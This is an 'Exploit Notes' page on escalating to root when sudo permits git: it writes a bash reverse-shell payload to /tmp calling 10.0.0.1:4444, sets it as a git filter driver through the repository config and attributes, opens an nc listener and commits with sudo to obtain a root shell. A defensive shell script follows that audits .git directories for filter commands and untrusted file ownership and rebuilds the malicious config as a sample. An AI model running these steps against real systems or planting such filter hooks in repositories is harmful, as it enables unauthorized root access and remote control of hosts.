Exploit Notes

Sudo Git Privilege Escalation

Last modified: 2023-03-12

Privilege Escalation

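When sudo allows a user to run git against a repository that the user can modify, git executes the commands defined in that repository's configuration, such as a filter driver, as root, which allows privilege escalation.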

Investigation

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"

If we can commit to the git repository as root, we may be able to escalate privileges.


Exploitation

1. Create a Payload

echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell

2. Set Git Config

# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell

3. Commit the Repository

Before committing, we need to start a listener on the local machine.

nc -lvnp 4444

Then commit with sudo.

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"

Now we should get a shell in the local terminal.
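From the defender's side, the files changed in step 2 can be checked before any privileged git run. The script below is an added example, not part of the original notes: the function names and finding labels are hypothetical, and the sample directory is constructed from the values shown above.

```sh
#!/bin/sh
# Added example: audit a repository before git is run against it with sudo.

# Print one finding per line for GIT_DIR ($1); TRUSTED_OWNER ($2) defaults to root.
scan_git_dir() {
    gitdir=$1 owner=${2:-root}
    if [ -f "$gitdir/config" ]; then
        # Filter drivers (and includes that could define them) in the repo config.
        # git runs a filter command as the invoking user, which is root under sudo.
        awk '
            /^[ \t]*\[/ {
                sect = $0; lc = tolower($0)
                if (lc ~ /^[ \t]*\[include/) print "CONFIG-INCLUDE " sect
                infilter = (lc ~ /^[ \t]*\[filter[ \t]+"/)
                next
            }
            infilter && tolower($0) ~ /^[ \t]*(clean|smudge|process)[ \t]*=/ {
                sub(/^[ \t]+/, ""); print "FILTER-COMMAND " sect " " $0
            }' "$gitdir/config"
    fi
    if [ -f "$gitdir/info/attributes" ]; then
        # Attribute rules that route paths through a filter driver.
        grep -E '(^|[[:space:]])filter=' "$gitdir/info/attributes" |
            sed 's/^/FILTER-ATTRIBUTE /'
    fi
    # Files that steer git but are not owned by the trusted user.
    for f in "$gitdir/config" "$gitdir/info/attributes"; do
        [ -e "$f" ] || continue
        find "$f" ! -user "$owner" -exec echo UNTRUSTED-OWNER {} \;
    done
}

# Return 0 when GIT_DIR is clean, 1 (after printing the findings) otherwise.
audit_git_dir() {
    findings=$(scan_git_dir "$@")
    if [ -z "$findings" ]; then return 0; fi
    printf '%s\n' "$findings"
    return 1
}

# Constructed sample: the config and attributes files that step 2 above leaves
# behind, written directly so that no git binary is needed.
make_sample_git_dir() {
    d=$(mktemp -d) && mkdir -p "$d/.git/info" || return 1
    printf '[filter "indent"]\n\tclean = /tmp/revshell\n' > "$d/.git/config"
    printf '*.php filter=indent\n' > "$d/.git/info/attributes"
    echo "$d/.git"
}
```

The scan reads only the repository-local files: a CONFIG-INCLUDE finding means the included file needs the same review, and .gitattributes files in the work tree are not scanned.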
